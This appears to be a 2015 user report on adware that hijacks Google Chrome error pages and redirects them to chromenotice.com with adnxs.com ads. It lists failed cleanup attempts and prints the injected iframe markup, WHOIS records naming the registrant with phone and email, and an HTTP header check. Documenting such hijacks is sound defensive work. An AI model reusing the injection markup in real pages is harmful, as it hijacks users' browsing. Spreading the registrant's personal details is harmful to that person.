Google Chrome error page Hijacked by Malware "www.chromenotice.com"
and "adnxs.com"
Adware Found: 2015 May ~ June
Adware Cleanup Status: Not resolved yet.
ChromeNotice-Malware/Adware Reproduce Scenario:
(1) URL keyin "About:config" (or something make you see Chrome error page)
(2) The Adware Hijack you to "www.chromenotice.com/error.html(DO NOT FOLLOW)"
(3) The page force then shows "adnxs.com(DO NOT FOLLOW)" ADs
(4) Tried the following procedures, no luck:
@ Chrome Reset Settings => Looks futile.
@ ADWCleaner.com 2015/May => Can't detect or remove it (ver 4.2.06)
@ AVG 2015 2015/Jun => Can't detect or remove it (ver 2015/06/03)
@ Microsoft MRT 2014/May => Can't detect or remove it (ver 205/05/13)
@ Spybot Search & Destroy => Can't detect or remove it (ver 2.2)
@ Uninstall Chrome to fix this issue
===> YES. it works. as long as you've done above actions and found all clean.
Your "view page source" in Chrome will too be hijacked by this ADware/Malware!
The adware redirect page will be looks like this,
chromenotice.com/error.html within an iframe.
代碼:
<html i18n-values="dir:textdirection;lang:language" dir="ltr" lang="en">
<head></head>
<body id="t" i18n-values=".style.fontFamily:fontfamily;.style.fontSize:fontsize"
jstcache="0" class="neterror" style="font-family: 'Segoe UI', Tahoma, sans-serif;
font-size: 75%; height: 100%; width: 100%; margin: 0px; text-align: center; overflow: hidden;">
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" src="http://www.chromenotice.com/error.html?data={"h1":"This webpage is not available","msg":"The webpage at <strong jscontent=\"failedUrl\"></strong> might be temporarily down or it may have moved permanently to a new web address.","url":"chrome://config/","li":[],"source_data":{"details":"Details","errorCode":"ERR_INVALID_URL","fontfamily":"'Segoe UI', Tahoma, sans-serif","fontsize":"75%","heading":"This webpage is not available","hideDetails":"Hide details","iconClass":"icon-generic","language":"en","suggestions":[],"summary":{"failedUrl":"chrome://config/","hostName":"config","msg":"The webpage at <strong jscontent=\"failedUrl\"></strong> might be temporarily down or it may have moved permanently to a new web address.","productName":"Google Chrome"},"textdirection":"ltr","title":"chrome://config/ is not available"},"country":"tw"}" width="1920" height="739"></iframe></body></html>
"zhangxiaoyang@337.com" is too owner of delta-homes.com
代碼:
The email zhangxiaoyang@337.com is related to these domains :
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
>>> Last update of whois database: Wed, 03 Jun 2015 06:29:10 GMT <<<
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
Domain Name: CHROMENOTICE.COM
Registry Domain ID: 1919575232_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Update Date: 2015-04-14T01:33:33Z
Creation Date: 2015-04-14T01:33:33Z
Registrar Registration Expiration Date: 2016-04-14T01:33:33Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
Registry Registrant ID:
Registrant Name: xianlin xie
Registrant Organization:
Registrant Street: UNIT 04 hongkong, hongkong 999077 Hong Kong
Registrant City: hongkong
Registrant State/Province: hongkong
Registrant Postal Code: 999077
Registrant Country: Hong Kong
Registrant Phone: +852.18610012110
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: zhangxiaoyang@337.com
Registry Admin ID:
Admin Name: xianlin xie
Admin Organization:
Admin Street: UNIT 04 hongkong, hongkong 999077 Hong Kong
Admin City: hongkong
Admin State/Province: hongkong
Admin Postal Code: 999077
Admin Country: Hong Kong
Admin Phone: +852.18610012110
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: zhangxiaoyang@337.com
Registry Tech ID:
Tech Name: xianlin xie
Tech Organization:
Tech Street: UNIT 04 hongkong, hongkong 999077 Hong Kong
Tech City: hongkong
Tech State/Province: hongkong
Tech Postal Code: 999077
Tech Country: Hong Kong
Tech Phone: +852.18610012110
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: zhangxiaoyang@337.com
Name Server: PDNS05.DOMAINCONTROL.COM
Name Server: PDNS06.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
More details about chromenotice.com
代碼:
GET / HTTP/1.1
Host: www . chromenotice . com
Accept: */*
Server ngx_openresty is not blacklisted
Server: ngx_openresty
Date: Mon, 01 Jun 2015 04:56:56 GMT